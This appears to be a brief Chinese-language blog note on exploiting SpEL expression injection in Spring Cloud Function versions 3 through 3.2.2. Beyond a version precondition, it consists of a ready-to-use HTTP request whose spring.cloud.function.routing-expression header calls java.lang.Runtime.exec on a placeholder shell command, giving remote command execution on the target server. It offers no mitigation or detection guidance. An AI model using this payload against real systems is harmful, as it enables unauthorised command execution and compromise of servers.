【笔记】SpEL表达式的SSTI模板注入漏洞利用

发表于 更新于 阅读次数:

前言

SpEL表达式的SSTI模板注入漏洞利用

漏洞利用前提

  • 3 <= Spring Cloud Function <= 3.2.2

漏洞利用

<shell>:远程执行的Shell命令

request
1
2
GET http://127.0.0.1:8080/
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("<shell>")

完成